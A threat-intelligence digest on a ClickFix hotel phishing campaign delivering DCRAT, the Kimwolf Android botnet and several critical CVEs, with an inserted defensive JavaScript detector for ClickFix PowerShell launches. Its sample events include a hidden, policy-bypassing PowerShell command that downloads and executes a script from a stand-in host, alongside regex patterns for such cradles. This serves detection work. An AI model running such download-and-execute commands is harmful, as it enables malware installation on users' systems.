Cyware Daily Threat Intelligence, January 06, 2026

The hospitality sector is checking into a digital nightmare. A new ClickFix campaign is targeting European hotels with phishing emails. When victims visit the fraudulent site, they are hit with a realistic fake BSOD that tricks them into running a PowerShell command to "fix" the error, unknowingly installing the DCRAT malware.
Your Android TV might be working a second job for cybercriminals. The Kimwolf botnet has enslaved over 2 million Android devices by exploiting exposed debug ports (ADB) to build a massive residential proxy network.
A popular automation tool has a near-maximum-severity flaw that puts host machines at risk. A critical vulnerability (CVE-2025-68668) in the open-source n8n platform allows authenticated users to execute arbitrary system commands, earning it a severity score of 9.9.
Top Malware Reported in the Last 24 Hours
ClickFix attack uses fake BSOD screens
A new ClickFix social engineering campaign targets the hospitality sector in Europe, utilizing fake Windows Blue Screen of Death (BSOD) screens to deceive users into executing malware. The attack begins with phishing emails impersonating Booking[.]com, claiming a significant refund due to a guest's reservation cancellation, which creates urgency. Victims are directed to a counterfeit Booking.com website that mimics the original and displays a fake error message. Clicking the refresh button triggers a full-screen fake BSOD, prompting users to run a malicious PowerShell command. This command downloads and compiles DCRAT, allowing attackers to gain control over the infected systems. Once established, the malware can steal data, spread throughout networks, and deploy additional payloads, such as cryptocurrency miners, further compromising the target's security.
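The ClickFix chain above ends with a user pasting a PowerShell command into a shell launched from their own desktop session, which is a behaviour a defender can hunt for. The following is an added example, not code from Cyware or any vendor: a small heuristic scorer run over constructed process-creation events. The field names (`image`, `parentImage`, `commandLine`), the indicator regexes, the parent-process list and the sample events are all my own assumptions about a typical Sysmon/EDR-style JSON export, and the hostnames use the reserved `.invalid` TLD.

```javascript
// Added example (not from the Cyware digest or any vendor): heuristic detection of
// ClickFix-style PowerShell launches. All field names, patterns and sample events
// below are constructed assumptions, not real telemetry.

// Indicator families commonly seen in paste-and-run PowerShell one-liners.
const CLICKFIX_INDICATORS = [
  { name: "download-cradle", re: /(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\s|Net\.WebClient)/i },
  { name: "invoke-expression", re: /(\biex\b|Invoke-Expression)/i },
  { name: "hidden-or-bypass", re: /(-w(indowstyle)?\s+hidden|-ep\s+bypass|-ExecutionPolicy\s+bypass)/i },
  { name: "inline-compile", re: /(Add-Type\b|csc\.exe)/i },
  { name: "encoded-command", re: /-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}/i },
];

// ClickFix relies on the victim launching the shell themselves (Win+R, Explorer,
// a console), so an interactive parent process raises the score.
const INTERACTIVE_PARENTS = new Set(["explorer.exe", "cmd.exe", "windowsterminal.exe"]);

function fileName(p) {
  return (p || "").toLowerCase().split(/[\\/]/).pop();
}

// Scores one process-creation event; only PowerShell images are considered.
function scoreEvent(evt) {
  const image = fileName(evt.image);
  if (image !== "powershell.exe" && image !== "pwsh.exe") {
    return { suspicious: false, hits: [], interactive: false };
  }
  const cmd = evt.commandLine || "";
  const hits = CLICKFIX_INDICATORS.filter((ind) => ind.re.test(cmd)).map((ind) => ind.name);
  const interactive = INTERACTIVE_PARENTS.has(fileName(evt.parentImage));
  // A download cradle alone is common in admin scripts; require either a second
  // indicator or an interactive parent before flagging, to limit false positives.
  const suspicious = hits.includes("download-cradle") && (hits.length >= 2 || interactive);
  return { suspicious, hits, interactive };
}

// Returns only the events the heuristic flags, with their scoring attached.
function scanEvents(events) {
  return events.map((e) => ({ ...e, ...scoreEvent(e) })).filter((r) => r.suspicious);
}

// Constructed sample events (assumed field layout, not real log data).
const SAMPLE_EVENTS = [
  {
    eventId: 1,
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    parentImage: "C:\\Windows\\explorer.exe",
    commandLine:
      "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('https://refund-portal.example.invalid/fix.ps1')\"",
  },
  {
    eventId: 2,
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    parentImage: "C:\\Windows\\System32\\services.exe",
    commandLine: "powershell.exe -File C:\\Scripts\\nightly-backup.ps1",
  },
  {
    eventId: 3,
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    parentImage: "C:\\Windows\\System32\\svchost.exe",
    commandLine:
      "powershell.exe -Command \"Invoke-WebRequest -Uri https://updates.corp.example.invalid/agent.msi -OutFile C:\\Temp\\agent.msi\"",
  },
];

// Stand-alone run: prints the flagged events and their matched indicators.
for (const r of scanEvents(SAMPLE_EVENTS)) {
  console.log(`event ${r.eventId}: ${r.hits.join(", ")} (interactive parent: ${r.interactive})`);
}
```

Event 1 is flagged on three indicator families from an Explorer-spawned shell; the scheduled backup (event 2) matches nothing, and the non-interactive software download (event 3) has a cradle but no second indicator, so it is left alone. In production the thresholds should be tuned against your own baseline, and the `-ep bypass`/`-w hidden` pattern should be paired with the Run-dialog history (RunMRU) and clipboard telemetry that most EDRs expose, since the paste-into-Run step is the distinctive part of ClickFix.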
Kimwolf botnet infects over 2 million devices
The Kimwolf botnet has infected over 2 million Android devices through exposed Android Debug Bridge (ADB) services and residential proxy networks. Active since at least August 2025, this botnet is identified as an Android variant of AISURU and is linked to record-breaking DDoS attacks. Most infections are concentrated in Vietnam, Brazil, India, and Saudi Arabia, with approximately 67% of the compromised devices having ADB enabled by default. Many of these devices are thought to be pre-infected with software development kits (SDKs) from proxy providers. The botnet is monetized by selling residential proxy bandwidth, using the Byteconnect SDK to have compromised devices carry out proxy tasks.
Top Vulnerabilities Reported in the Last 24 Hours
New n8n bug allows system command execution
A critical security vulnerability has been discovered in n8n, an open-source workflow automation platform, allowing authenticated users to execute arbitrary system commands on the host machine. This vulnerability, tracked as CVE-2025-68668 and rated 9.9 on the CVSS scoring system, affects versions from 1.0.0 to 1.111.0. It arises from a failure in the protection mechanism of the Pyodide-based Python Code Node. Any user with permission to create or modify workflows can exploit the flaw to run commands with the same privileges as the n8n process. The vulnerability has been addressed in n8n version 2.0.0, which introduces a task runner-based native Python implementation for enhanced security.
Critical vulnerabilities found in npm packages
A critical vulnerability in the "@adonisjs/bodyparser" npm package, tracked as CVE-2026-21440 with a CVSS score of 9.2, has been disclosed, allowing remote attackers to write arbitrary files on servers through a path traversal issue in the MultipartFile.move() function. This flaw affects AdonisJS versions up to 10.1.1 and 11.0.0-next.5, with fixes implemented in subsequent releases. Exploitation of this vulnerability could lead to remote code execution if attackers overwrite sensitive files. Concurrently, another serious vulnerability in the jsPDF npm package, identified as CVE-2025-68428, also scored 9.2 on the CVSS scale; it stems from unsanitized path handling that lets attackers read arbitrary file contents. This vulnerability has been addressed in version 4.0.0 of jsPDF.